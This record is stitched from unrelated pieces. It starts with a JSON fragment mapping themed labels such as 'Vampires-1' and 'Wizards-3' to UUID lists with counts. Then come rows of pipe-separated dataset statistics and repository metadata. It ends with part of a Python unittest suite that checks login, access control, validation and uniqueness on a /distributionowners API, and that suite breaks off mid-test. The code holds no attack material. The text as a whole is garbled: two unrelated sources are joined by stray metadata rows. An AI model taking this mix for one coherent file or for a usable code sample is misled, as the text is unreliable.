"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "a6712361-976a-4ef9-bae9-48505344904e",
"count": 7
}
],
"Tree Hugging-4": [
{
"id": "3d0ec3bd-d894-4861-abcb-7b2e4f4de05c",
"count": 1
},
{
"id": "5f22116a-8b6a-4bbe-999f-7329e1e2b2d9",
"count": 1
},
{
"id": "d6e23afa-7e08-4049-baf0-d4d0134ba2c8",
"count": 1
},
{
"id": "46700ccc-0975-49d1-b3fc-edb1eda3b624",
"count": 1
},
{
"id": "d7ce9104-0ad3-4d3d-bb2c-c456c25030f6",
"count": 1
},
{
"id": "f836b155-8829-460b-91f8-4cd00b988196",
"count": 1
},
{
"id": "f1d81cfc-cff8-4478-92b6-efbfc5084165",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "9d44ec73-169a-4354-8ee1-238b8abd8d81",
"count": 1
},
{
"id": "8ea6c234-ede2-4543-ab8e-38d7a503a5e1",
"count": 1
},
{
"id": "77cf9d11-936f-4e02-8595-0cbcabaafb1e",
"count": 1
},
{
"id": "50c915a4-a75f-40e7-b78a-9c304dcdd83e",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "a6712361-976a-4ef9-bae9-48505344904e",
"count": 7
}
],
"Under the Sea-1": [
{
"id": "7003ebae-5d82-4360-ae63-0e51c37977ed",
"count": 1
},
{
"id": "fbbb3f9d-8629-4815-8b7d-f8ec9368b9b0",
"count": 1
},
{
"id": "143052f0-4fcc-4703-9147-75b65ddb8e0f",
"count": 1
},
{
"id": "7a1a93c3-8561-4c65-bea8-a9c3a898a48c",
"count": 1
},
{
"id": "c2776694-6183-498d-9a38-e4c5c9e78179",
"count": 1
},
{
"id": "abb47990-a5a9-4a22-a8bb-d229b17132c6",
"count": 1
},
{
"id": "a61a7809-4bef-48e9-afbc-e473eb7072e8",
"count": 1
},
{
"id": "c55c60dc-40ed-4a36-9daa-702f79ffe818",
"count": 1
},
{
"id": "c82be2ca-8350-4cf5-83b6-e8b60a9e21c6",
"count": 1
},
{
"id": "ada68b91-3379-483e-93a0-b6c7c675c1dc",
"count": 1
},
{
"id": "b7d3681a-78d8-469f-9109-5f8faf04b707",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "c4a837f2-dbb0-435f-adf9-7632b97f94ab",
"count": 8
}
],
"Under the Sea-2": [
{
"id": "7003ebae-5d82-4360-ae63-0e51c37977ed",
"count": 1
},
{
"id": "6a636f74-3bac-4b88-a24f-32a66a94e340",
"count": 1
},
{
"id": "fbbb3f9d-8629-4815-8b7d-f8ec9368b9b0",
"count": 1
},
{
"id": "143052f0-4fcc-4703-9147-75b65ddb8e0f",
"count": 1
},
{
"id": "7a1a93c3-8561-4c65-bea8-a9c3a898a48c",
"count": 1
},
{
"id": "abb47990-a5a9-4a22-a8bb-d229b17132c6",
"count": 1
},
{
"id": "a61a7809-4bef-48e9-afbc-e473eb7072e8",
"count": 1
},
{
"id": "cad50269-6e80-47ea-a027-fa274f904e86",
"count": 1
},
{
"id": "bc84fb92-bb66-4f1a-b360-f87fdbcd45b7",
"count": 1
},
{
"id": "ada68b91-3379-483e-93a0-b6c7c675c1dc",
"count": 1
},
{
"id": "b7d3681a-78d8-469f-9109-5f8faf04b707",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "c4a837f2-dbb0-435f-adf9-7632b97f94ab",
"count": 8
}
],
"Unicorns": [
{
"id": "0fc18921-59f5-413f-a221-dc47d31b2ec8",
"count": 1
},
{
"id": "ff87a671-054f-4357-8a62-450d36559a1b",
"count": 1
},
{
"id": "f74dfd07-d17c-4890-82c3-4b12a6029940",
"count": 1
},
{
"id": "3320865c-ef02-4f18-82b0-47a6d845de0f",
"count": 1
},
{
"id": "e321bbb0-1660-4452-a9b7-d41674f7f743",
"count": 1
},
{
"id": "cb993412-69bc-4000-ac8f-b2f62161fc55",
"count": 1
},
{
"id": "aa01cb8c-f080-456b-a91a-f1d7943a70b2",
"count": 1
},
{
"id": "8bc7fdf0-3e1e-487c-833d-7c74aa02c0c1",
"count": 1
},
{
"id": "e9822b57-8e42-4158-981d-f0b0b0646fc9",
"count": 1
},
{
"id": "20516400-b37a-46d2-89c8-d6be88f5ab3d",
"count": 1
},
{
"id": "ff80029e-650e-469d-8393-0edf7d9cd695",
"count": 1
},
{
"id": "8e742d49-e6f0-4016-ba4c-11878fad89cb",
"count": 1
},
{
"id": "fe424eb3-7df8-4317-8776-6d960afbb90a",
"count": 1
},
{
"id": "c0690e60-e11e-4903-b1e0-e36854213b65",
"count": 7
}
],
"Vampires-1": [
{
"id": "465d8c18-c76b-488a-a4ec-ec0d2267a307",
"count": 1
},
{
"id": "b1c6df1d-7709-41e4-a79f-0dc722600191",
"count": 1
},
{
"id": "8644d4d1-8499-40a8-a01f-68172c82bf58",
"count": 1
},
{
"id": "a1b4f7ec-ea2e-4d90-98cd-0c92bd9f64c1",
"count": 1
},
{
"id": "98527faa-9d06-4f46-b2f7-c78aedacc3a4",
"count": 1
},
{
"id": "487aced8-e018-4c93-8e13-bb68b43096a4",
"count": 1
},
{
"id": "ff5444cb-0ecd-4482-a8d8-09332f382dbd",
"count": 1
},
{
"id": "f8a52a83-0087-4df3-995a-45e15bf664b4",
"count": 1
},
{
"id": "3532a279-b8e1-4124-bcd7-d7f4c71673eb",
"count": 1
},
{
"id": "abfcd08a-cfb5-4d34-b950-f57a88c5cb8e",
"count": 1
},
{
"id": "05d3b392-cbd0-437a-a21f-a36d5093a719",
"count": 1
},
{
"id": "5bbc405d-0cfb-45c6-baa1-75845d82e713",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "59e597d5-37e7-4add-b454-c3399b4e3704",
"count": 7
}
],
"Vampires-2": [
{
"id": "59d0839b-a021-4227-aa0f-1fa2ff806892",
"count": 1
},
{
"id": "b1c6df1d-7709-41e4-a79f-0dc722600191",
"count": 1
},
{
"id": "3887af00-a87d-4396-b82b-38b88c084e8e",
"count": 1
},
{
"id": "8644d4d1-8499-40a8-a01f-68172c82bf58",
"count": 1
},
{
"id": "a1b4f7ec-ea2e-4d90-98cd-0c92bd9f64c1",
"count": 1
},
{
"id": "487aced8-e018-4c93-8e13-bb68b43096a4",
"count": 1
},
{
"id": "ff5444cb-0ecd-4482-a8d8-09332f382dbd",
"count": 1
},
{
"id": "f8a52a83-0087-4df3-995a-45e15bf664b4",
"count": 1
},
{
"id": "3532a279-b8e1-4124-bcd7-d7f4c71673eb",
"count": 1
},
{
"id": "abfcd08a-cfb5-4d34-b950-f57a88c5cb8e",
"count": 1
},
{
"id": "05d3b392-cbd0-437a-a21f-a36d5093a719",
"count": 1
},
{
"id": "5bbc405d-0cfb-45c6-baa1-75845d82e713",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "59e597d5-37e7-4add-b454-c3399b4e3704",
"count": 7
}
],
"Vampires-3": [
{
"id": "b1c6df1d-7709-41e4-a79f-0dc722600191",
"count": 1
},
{
"id": "8644d4d1-8499-40a8-a01f-68172c82bf58",
"count": 1
},
{
"id": "a1b4f7ec-ea2e-4d90-98cd-0c92bd9f64c1",
"count": 1
},
{
"id": "487aced8-e018-4c93-8e13-bb68b43096a4",
"count": 1
},
{
"id": "9cdebdfd-a29b-4482-ab83-012d5faba2e4",
"count": 1
},
{
"id": "de652420-eacf-4f9d-9f13-c6bc02b0fa72",
"count": 1
},
{
"id": "ff5444cb-0ecd-4482-a8d8-09332f382dbd",
"count": 1
},
{
"id": "c7649d57-3537-45a2-b57e-98e7d32025c9",
"count": 1
},
{
"id": "3532a279-b8e1-4124-bcd7-d7f4c71673eb",
"count": 1
},
{
"id": "abfcd08a-cfb5-4d34-b950-f57a88c5cb8e",
"count": 1
},
{
"id": "05d3b392-cbd0-437a-a21f-a36d5093a719",
"count": 1
},
{
"id": "b1653811-1c2c-4e6c-bf1c-287d1b496d51",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "59e597d5-37e7-4add-b454-c3399b4e3704",
"count": 7
}
],
"Vampires-4": [
{
"id": "b1c6df1d-7709-41e4-a79f-0dc722600191",
"count": 1
},
{
"id": "3887af00-a87d-4396-b82b-38b88c084e8e",
"count": 1
},
{
"id": "31d0c37f-ebce-4362-9400-6b9a6e439247",
"count": 1
},
{
"id": "a60b3c77-62e4-4718-9ddb-cb2e3f1f861f",
"count": 1
},
{
"id": "8644d4d1-8499-40a8-a01f-68172c82bf58",
"count": 1
},
{
"id": "a1b4f7ec-ea2e-4d90-98cd-0c92bd9f64c1",
"count": 1
},
{
"id": "487aced8-e018-4c93-8e13-bb68b43096a4",
"count": 1
},
{
"id": "ff5444cb-0ecd-4482-a8d8-09332f382dbd",
"count": 1
},
{
"id": "3532a279-b8e1-4124-bcd7-d7f4c71673eb",
"count": 1
},
{
"id": "abfcd08a-cfb5-4d34-b950-f57a88c5cb8e",
"count": 1
},
{
"id": "05d3b392-cbd0-437a-a21f-a36d5093a719",
"count": 1
},
{
"id": "d908bf00-86ba-4911-b15b-1af2a79dff85",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "59e597d5-37e7-4add-b454-c3399b4e3704",
"count": 7
}
],
"Walls": [
{
"id": "53847a21-aded-4aaa-9bf1-8592e67763ef",
"count": 1
},
{
"id": "ef5abd21-9736-4e9e-b195-813461cfcd0a",
"count": 1
},
{
"id": "084446ca-fec5-446f-b6f8-edf32ecb57e3",
"count": 1
},
{
"id": "50974264-b509-4df9-802b-623805a4cbee",
"count": 1
},
{
"id": "d1abd95a-4ecc-479c-b200-5aaf7c993ef8",
"count": 1
},
{
"id": "9e64bc76-c6df-4b3c-b37f-f9386d30cab9",
"count": 1
},
{
"id": "a2c3eac5-3354-44ce-97c2-bafce78433ca",
"count": 1
},
{
"id": "f836b155-8829-460b-91f8-4cd00b988196",
"count": 1
},
{
"id": "9f7b7563-752b-4391-95d1-f5e3960d35c1",
"count": 1
},
{
"id": "01398f5f-f38e-45a7-b755-e65c8fa779f8",
"count": 1
},
{
"id": "f7321473-5747-4430-86b2-b5029d9f6486",
"count": 1
},
{
"id": "6bf261c8-98e4-491e-9e51-a9058ff2c03a",
"count": 1
},
{
"id": "79cabbe0-1c44-4888-8ebc-25a4c3e2c5d7",
"count": 1
},
{
"id": "30a4d3de-e004-4a15-9f45-4d50813de533",
"count": 7
}
],
"Well Read-1": [
{
"id": "40dfe354-d527-4f56-8457-b95884700a40",
"count": 1
},
{
"id": "cb33529b-80bd-4f52-94cc-d8371c53ad75",
"count": 1
},
{
"id": "61921b05-ee83-4768-a405-4d3355c0ad6e",
"count": 1
},
{
"id": "711412f1-9ab3-48b6-91a4-77232b416a32",
"count": 1
},
{
"id": "efedf97b-8901-4558-8bd0-3f488097f686",
"count": 1
},
{
"id": "7b14ff70-6817-4539-b19b-142f8f6b6b1f",
"count": 1
},
{
"id": "c2776694-6183-498d-9a38-e4c5c9e78179",
"count": 1
},
{
"id": "0360d27b-37e1-4e00-9cfc-b574efc38ea0",
"count": 1
},
{
"id": "323db259-d35e-467d-9a46-4adcb2fc107c",
"count": 1
},
{
"id": "c5a0be10-c20f-4ac0-89a5-1770ecf48aad",
"count": 1
},
{
"id": "95681c43-ba2e-41a5-8a51-e66db8ec6cb9",
"count": 1
},
{
"id": "c82be2ca-8350-4cf5-83b6-e8b60a9e21c6",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "b5a4dfac-2a47-48be-8611-d7f69e261c60",
"count": 7
}
],
"Well Read-2": [
{
"id": "40dfe354-d527-4f56-8457-b95884700a40",
"count": 1
},
{
"id": "cb33529b-80bd-4f52-94cc-d8371c53ad75",
"count": 1
},
{
"id": "61921b05-ee83-4768-a405-4d3355c0ad6e",
"count": 1
},
{
"id": "711412f1-9ab3-48b6-91a4-77232b416a32",
"count": 1
},
{
"id": "efedf97b-8901-4558-8bd0-3f488097f686",
"count": 1
},
{
"id": "c2776694-6183-498d-9a38-e4c5c9e78179",
"count": 1
},
{
"id": "0360d27b-37e1-4e00-9cfc-b574efc38ea0",
"count": 1
},
{
"id": "323db259-d35e-467d-9a46-4adcb2fc107c",
"count": 1
},
{
"id": "416a2796-08c7-4370-8bc5-2152877e9034",
"count": 1
},
{
"id": "f5ed9f08-56e8-4e24-aae2-05270d7c1ba8",
"count": 1
},
{
"id": "c5a0be10-c20f-4ac0-89a5-1770ecf48aad",
"count": 1
},
{
"id": "c82be2ca-8350-4cf5-83b6-e8b60a9e21c6",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "b5a4dfac-2a47-48be-8611-d7f69e261c60",
"count": 7
}
],
"Well Read-3": [
{
"id": "149d4f00-106b-4aa7-a667-6360d2e149e7",
"count": 1
},
{
"id": "40dfe354-d527-4f56-8457-b95884700a40",
"count": 1
},
{
"id": "cb33529b-80bd-4f52-94cc-d8371c53ad75",
"count": 1
},
{
"id": "61921b05-ee83-4768-a405-4d3355c0ad6e",
"count": 1
},
{
"id": "efedf97b-8901-4558-8bd0-3f488097f686",
"count": 1
},
{
"id": "7b14ff70-6817-4539-b19b-142f8f6b6b1f",
"count": 1
},
{
"id": "c2776694-6183-498d-9a38-e4c5c9e78179",
"count": 1
},
{
"id": "0360d27b-37e1-4e00-9cfc-b574efc38ea0",
"count": 1
},
{
"id": "323db259-d35e-467d-9a46-4adcb2fc107c",
"count": 1
},
{
"id": "c5a0be10-c20f-4ac0-89a5-1770ecf48aad",
"count": 1
},
{
"id": "95681c43-ba2e-41a5-8a51-e66db8ec6cb9",
"count": 1
},
{
"id": "d6914dba-0d27-4055-ac34-b3ebf5802221",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "b5a4dfac-2a47-48be-8611-d7f69e261c60",
"count": 7
}
],
"Well Read-4": [
{
"id": "149d4f00-106b-4aa7-a667-6360d2e149e7",
"count": 1
},
{
"id": "cb33529b-80bd-4f52-94cc-d8371c53ad75",
"count": 1
},
{
"id": "de19d2db-604b-4d5f-8184-9bb0a31c7405",
"count": 1
},
{
"id": "61921b05-ee83-4768-a405-4d3355c0ad6e",
"count": 1
},
{
"id": "efedf97b-8901-4558-8bd0-3f488097f686",
"count": 1
},
{
"id": "7b14ff70-6817-4539-b19b-142f8f6b6b1f",
"count": 1
},
{
"id": "c2776694-6183-498d-9a38-e4c5c9e78179",
"count": 1
},
{
"id": "0360d27b-37e1-4e00-9cfc-b574efc38ea0",
"count": 1
},
{
"id": "323db259-d35e-467d-9a46-4adcb2fc107c",
"count": 1
},
{
"id": "2c65088f-bbbd-4e8d-b482-58181069bef2",
"count": 1
},
{
"id": "f5ed9f08-56e8-4e24-aae2-05270d7c1ba8",
"count": 1
},
{
"id": "c5a0be10-c20f-4ac0-89a5-1770ecf48aad",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "b5a4dfac-2a47-48be-8611-d7f69e261c60",
"count": 7
}
],
"Witchcraft-1": [
{
"id": "99a14228-3716-4448-a8c3-93928b9b85d6",
"count": 1
},
{
"id": "6ce1aa49-fe00-4390-8c4b-d1203cc337cd",
"count": 1
},
{
"id": "32cf273e-b8f7-434b-9d5d-883dfd6f7423",
"count": 1
},
{
"id": "c9d7d31e-eaa7-4edf-8e98-5a191ec3b91d",
"count": 2
},
{
"id": "24fe5c92-7da2-47b5-ad13-f95590e93ac2",
"count": 1
},
{
"id": "8adbd4a5-3171-495a-a540-0ecf280b77fc",
"count": 1
},
{
"id": "f484f19a-0121-4173-a70b-6698cc5f6303",
"count": 1
},
{
"id": "2c6e5b25-b721-45ee-894a-697de1310b8c",
"count": 1
},
{
"id": "2b85a552-2119-4d9c-b7c1-c09c2d9f2f38",
"count": 1
},
{
"id": "955aa79b-448e-4752-8e36-0fe80c18280c",
"count": 1
},
{
"id": "d43a3eb7-3daf-4667-b824-1f5d801c9341",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "00030770-5e99-4943-819d-8d807c24cc14",
"count": 7
}
],
"Witchcraft-2": [
{
"id": "c90a12af-b453-4d83-9a14-5411b562d480",
"count": 1
},
{
"id": "99a14228-3716-4448-a8c3-93928b9b85d6",
"count": 1
},
{
"id": "6ce1aa49-fe00-4390-8c4b-d1203cc337cd",
"count": 1
},
{
"id": "c9d7d31e-eaa7-4edf-8e98-5a191ec3b91d",
"count": 2
},
{
"id": "d9fb56fc-47a4-44ba-8b55-4d0ceb8ce62f",
"count": 1
},
{
"id": "8adbd4a5-3171-495a-a540-0ecf280b77fc",
"count": 1
},
{
"id": "f484f19a-0121-4173-a70b-6698cc5f6303",
"count": 1
},
{
"id": "2c6e5b25-b721-45ee-894a-697de1310b8c",
"count": 1
},
{
"id": "05d3b392-cbd0-437a-a21f-a36d5093a719",
"count": 1
},
{
"id": "51278b56-5056-4a37-a1e8-daca45d8e360",
"count": 1
},
{
"id": "955aa79b-448e-4752-8e36-0fe80c18280c",
"count": 1
},
{
"id": "18756fe5-70f0-48d9-a4f1-ea78f77d2084",
"count": 1
},
{
"id": "00030770-5e99-4943-819d-8d807c24cc14",
"count": 7
}
],
"Wizards-1": [
{
"id": "c6344ecd-ca57-4104-a77a-d7d14264776d",
"count": 1
},
{
"id": "92c17066-c551-4aed-9258-1e5ed947385b",
"count": 1
},
{
"id": "59d38ef7-5017-4ea3-b97f-a8fe12d03e98",
"count": 1
},
{
"id": "3d89c1a1-1896-4360-b123-52d82a6871d4",
"count": 1
},
{
"id": "a52e90c0-b012-4ce5-8462-1e33c7143de5",
"count": 1
},
{
"id": "5360fe8c-41b0-4409-b03e-072f129fb352",
"count": 1
},
{
"id": "4b153c2f-fc87-49bc-9d1e-d5e7e25b2142",
"count": 1
},
{
"id": "a48ebd79-95d7-4860-9785-45e34a94755d",
"count": 1
},
{
"id": "94c1f80e-65b7-4534-bfd4-1ae88274945b",
"count": 1
},
{
"id": "393fc485-d3c1-4826-933d-89f66df769d4",
"count": 1
},
{
"id": "323db259-d35e-467d-9a46-4adcb2fc107c",
"count": 1
},
{
"id": "979cd394-80ce-4559-9f3a-57cd84299182",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "76b4a655-0051-47c6-a683-c4c3f56e45fc",
"count": 7
}
],
"Wizards-2": [
{
"id": "ac4e2977-b518-4fa3-83e4-5af326ded290",
"count": 1
},
{
"id": "c6344ecd-ca57-4104-a77a-d7d14264776d",
"count": 1
},
{
"id": "92c17066-c551-4aed-9258-1e5ed947385b",
"count": 1
},
{
"id": "3a0b3006-16cb-4752-908e-3c9f37ac249c",
"count": 1
},
{
"id": "59d38ef7-5017-4ea3-b97f-a8fe12d03e98",
"count": 1
},
{
"id": "a52e90c0-b012-4ce5-8462-1e33c7143de5",
"count": 1
},
{
"id": "5360fe8c-41b0-4409-b03e-072f129fb352",
"count": 1
},
{
"id": "4b153c2f-fc87-49bc-9d1e-d5e7e25b2142",
"count": 1
},
{
"id": "a48ebd79-95d7-4860-9785-45e34a94755d",
"count": 1
},
{
"id": "323db259-d35e-467d-9a46-4adcb2fc107c",
"count": 1
},
{
"id": "b19de7a5-c291-405b-a2e6-8d3ac56e6570",
"count": 1
},
{
"id": "979cd394-80ce-4559-9f3a-57cd84299182",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "8c6eadd8-71d8-4a87-8395-efe8cc9f0676",
"count": 1
},
{
"id": "76b4a655-0051-47c6-a683-c4c3f56e45fc",
"count": 6
}
],
"Wizards-3": [
{
"id": "92c17066-c551-4aed-9258-1e5ed947385b",
"count": 1
},
{
"id": "59d38ef7-5017-4ea3-b97f-a8fe12d03e98",
"count": 1
},
{
"id": "3d89c1a1-1896-4360-b123-52d82a6871d4",
"count": 1
},
{
"id": "5449d71c-5c1b-44c6-9407-0212aa3c3e3a",
"count": 1
},
{
"id": "a52e90c0-b012-4ce5-8462-1e33c7143de5",
"count": 1
},
{
"id": "5360fe8c-41b0-4409-b03e-072f129fb352",
"count": 1
},
{
"id": "4b153c2f-fc87-49bc-9d1e-d5e7e25b2142",
"count": 1
},
{
"id": "a48ebd79-95d7-4860-9785-45e34a94755d",
"count": 1
},
{
"id": "323db259-d35e-467d-9a46-4adcb2fc107c",
"count": 1
},
{
"id": "2dc0bafd-debc-4b62-9fe0-56b4aad02484",
"count": 1
},
{
"id": "979cd394-80ce-4559-9f3a-57cd84299182",
"count": 1
},
{
"id": "f5ed9f08-56e8-4e24-aae2-05270d7c1ba8",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "76b4a655-0051-47c6-a683-c4c3f56e45fc",
"count": 7
}
],
"Wizards-4": [
{
"id": "fc3765b7-bd99-4c66-8761-1c9cc5bd8666",
"count": 1
},
{
"id": "92c17066-c551-4aed-9258-1e5ed947385b",
"count": 1
},
{
"id": "59d38ef7-5017-4ea3-b97f-a8fe12d03e98",
"count": 1
},
{
"id": "4bb9ac55-4bb4-4447-b214-6a108ddb3f07",
"count": 1
},
{
"id": "5449d71c-5c1b-44c6-9407-0212aa3c3e3a",
"count": 1
},
{
"id": "a52e90c0-b012-4ce5-8462-1e33c7143de5",
"count": 1
},
{
"id": "5360fe8c-41b0-4409-b03e-072f129fb352",
"count": 1
},
{
"id": "4b153c2f-fc87-49bc-9d1e-d5e7e25b2142",
"count": 1
},
{
"id": "393fc485-d3c1-4826-933d-89f66df769d4",
"count": 1
},
{
"id": "e7d0f29b-fcc4-4135-af36-6539912ab3bb",
"count": 1
},
{
"id": "da367981-9d6f-419f-9f58-f969b6183336",
"count": 1
},
{
"id": "979cd394-80ce-4559-9f3a-57cd84299182",
"count": 1
},
{
"id": "7eb8fd94-2b59-4b05-b4d0-c93497301d19",
"count": 1
},
{
"id": "76b4a655-0051-47c6-a683-c4c3f56e45fc",
"count": 7
}
]
}
| 20.177405
| 51
| 0.486443
| 13,745
| 140,919
| 4.987268
| 0.236377
| 0.069409
| 0.181007
| 0.005602
| 0.849249
| 0.849249
| 0.849249
| 0.849249
| 0.849249
| 0.837695
| 0
| 0.375456
| 0.317147
| 140,919
| 6,984
| 52
| 20.177406
| 0.336912
| 0
| 0
| 0.460052
| 0
| 0
| 0.523223
| 0.43046
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
c64f61d47b0131e23bc719477de97ae043b68c4b
| 9,903
|
py
|
Python
|
appsrc/tests/test_distributionowners.py
|
arieunier/covid19-bookable-slot
|
5869edebf3dbd84bb493ceefd5008e3d7b2307c7
|
[
"MIT"
] | null | null | null |
appsrc/tests/test_distributionowners.py
|
arieunier/covid19-bookable-slot
|
5869edebf3dbd84bb493ceefd5008e3d7b2307c7
|
[
"MIT"
] | null | null | null |
appsrc/tests/test_distributionowners.py
|
arieunier/covid19-bookable-slot
|
5869edebf3dbd84bb493ceefd5008e3d7b2307c7
|
[
"MIT"
] | 1
|
2020-06-02T23:35:39.000Z
|
2020-06-02T23:35:39.000Z
|
import os
import unittest
from appsrc import app
from libs import variables
import appsrc.tests.utils
import ujson
class TestCases(unittest.TestCase):
    """Integration tests for the /distributionowners REST endpoints.

    Covers anonymous (read-only) access and authenticated create/update
    flows, including server-side validation failures and uniqueness
    constraints on telephone and email.
    """

    def setUp(self):
        # Reset database content and clear any session cookies so every
        # test starts from the same known state.
        appsrc.tests.utils.fillDb()
        appsrc.tests.utils.purgeCookies()

    def tearDown(self):
        # Nothing to clean up: setUp re-initialises all state per test.
        pass

    def _login_admin(self):
        """Authenticate as the default admin; return the session cookie list."""
        result, code = appsrc.tests.utils.HTTP_GET(variables.DEFAULT_API_URL + '/login', {"Authorization": appsrc.tests.utils.authorizationHeader(variables.DEFAULT_ADMIN_USERNAME, variables.DEFAULT_ADMIN_PASSWORD)}, {}, {})
        session_cookie = result.headers.getlist('Set-Cookie')
        # getlist() always returns a list (never None), so assert it is
        # non-empty instead of assertIsNotNone, which could never fail.
        self.assertTrue(session_cookie)
        self.assertEqual(code, 200)
        return session_cookie

    def _post_owner(self, headers, payload):
        """POST a distribution-owner payload; return (result, code)."""
        return appsrc.tests.utils.HTTP_POST(variables.DEFAULT_API_URL + '/distributionowners',
                                            headers,
                                            {},
                                            ujson.dumps(payload))

    def _put_owner(self, headers, owner_id, payload):
        """PUT a distribution-owner payload to /distributionowners/<id>; return (result, code)."""
        return appsrc.tests.utils.HTTP_PUT(variables.DEFAULT_API_URL + '/distributionowners/' + owner_id,
                                           headers,
                                           {},
                                           ujson.dumps(payload))

    def _assert_owner_count(self, session_cookie, expected):
        """Fetch the owner list and assert it holds exactly `expected` entries."""
        result, code = appsrc.tests.utils.HTTP_GET(variables.DEFAULT_API_URL + '/distributionowners', {'cookie':session_cookie}, {}, {})
        self.assertEqual(code, 200)
        self.assertEqual(len(result.json), expected)
        return result.json

    def test_access_unauthenticated(self):
        """Anonymous clients may read distribution owners but never modify them."""
        session_cookie = self._login_admin()
        # gets a real distribution owner id and saves it for later use
        result, code = appsrc.tests.utils.HTTP_GET(variables.DEFAULT_API_URL + '/distributionowners', {'cookie':session_cookie}, {}, {})
        self.assertEqual(code, 200)
        distributionOwnerId = result.json[0]['id']
        # flush sessions so the remaining calls are anonymous
        appsrc.tests.utils.purgeCookies()
        # listing all distribution owners must succeed without a session
        result, code = appsrc.tests.utils.HTTP_GET(variables.DEFAULT_API_URL + '/distributionowners', {}, {}, {})
        self.assertEqual(code, 200)
        # fetching a single distribution owner must succeed without a session
        result, code = appsrc.tests.utils.HTTP_GET(variables.DEFAULT_API_URL + '/distributionowners/' + distributionOwnerId, {}, {}, {})
        self.assertEqual(code, 200)
        # POST without a session must be rejected
        result, code = self._post_owner({}, {"name":"name"})
        self.assertEqual(code, 401)
        # PUT without a session must be rejected
        result, code = self._put_owner({}, distributionOwnerId, {"name":"enwnames"})
        self.assertEqual(code, 401)

    def test_access_authenticated(self):
        """Admins can update/create owners; invalid or duplicate data is rejected."""
        session_cookie = self._login_admin()
        auth = {'cookie':session_cookie}
        # gets a real distribution owner and saves it for later use
        result, code = appsrc.tests.utils.HTTP_GET(variables.DEFAULT_API_URL + '/distributionowners', auth, {}, {})
        self.assertEqual(code, 200)
        distributionOwnerList = result.json
        distributionOwnerId = distributionOwnerList[0]['id']
        nbDistributionOwner = len(result.json)
        # updates default DO with an incorrect value -> rejected
        result, code = self._put_owner(auth, distributionOwnerId, {"name":""})
        self.assertEqual(code, 500)
        # updates default DO with a correct value -> persisted and echoed back
        result, code = self._put_owner(auth, distributionOwnerId, {"name":"ANewValue"})
        self.assertEqual(code, 200)
        self.assertEqual(result.json['name'], 'ANewValue')
        # creates a new DO -> empty name is rejected and nothing is added
        result, code = self._post_owner(auth, {"name":""})
        self.assertEqual(code, 500)
        self._assert_owner_count(session_cookie, nbDistributionOwner)
        # empty logoUrl is rejected and nothing is added
        result, code = self._post_owner(auth, {"name":"correct", "logoUrl":""})
        self.assertEqual(code, 500)
        self._assert_owner_count(session_cookie, nbDistributionOwner)
        # empty telephone is rejected and nothing is added
        result, code = self._post_owner(auth, {"name":"correct", "logoUrl":"www.google.fr", "telephone":""})
        self.assertEqual(code, 500)
        self._assert_owner_count(session_cookie, nbDistributionOwner)
        # empty email is rejected and nothing is added
        result, code = self._post_owner(auth, {"name":"correct", "logoUrl":"www.google.fr", "telephone":"01232132131", "email":""})
        self.assertEqual(code, 500)
        self._assert_owner_count(session_cookie, nbDistributionOwner)
        # creates a new DO -> empty reference address is rejected
        result, code = self._post_owner(auth, {"name":"correct", "logoUrl":"www.google.fr", "telephone":"01232132131", "email":"test@test.com", "refAddressId":""})
        self.assertEqual(code, 500)
        self._assert_owner_count(session_cookie, nbDistributionOwner)
        # unknown reference address is rejected
        result, code = self._post_owner(auth, {"name":"correct", "logoUrl":"www.google.fr", "telephone":"01232132131", "email":"test@test.com", "refAddressId":"unknown"})
        self.assertEqual(code, 500)
        self._assert_owner_count(session_cookie, nbDistributionOwner)
        # creates a new DO -> unicity check on phone number
        result, code = self._post_owner(auth, {"name":"correct", "logoUrl":"www.google.fr", "telephone":distributionOwnerList[0]['telephone'], "email":"test@test.com", "refAddressId":distributionOwnerList[0]['address']['id']})
        self.assertEqual(code, 500)
        # creates a new DO -> unicity check on email
        result, code = self._post_owner(auth, {"name":"correct", "logoUrl":"www.google.fr", "telephone":"01232132131", "email":distributionOwnerList[0]['email'], "refAddressId":distributionOwnerList[0]['address']['id']})
        self.assertEqual(code, 500)
        # fully valid payload succeeds
        result, code = self._post_owner(auth, {"name":"correct", "logoUrl":"www.google.fr", "telephone":"01232132131", "email":"test@test.com", "refAddressId":distributionOwnerList[0]['address']['id']})
        self.assertEqual(code, 200)
        newDO = result.json['id']
        # the owner list now contains one more entry
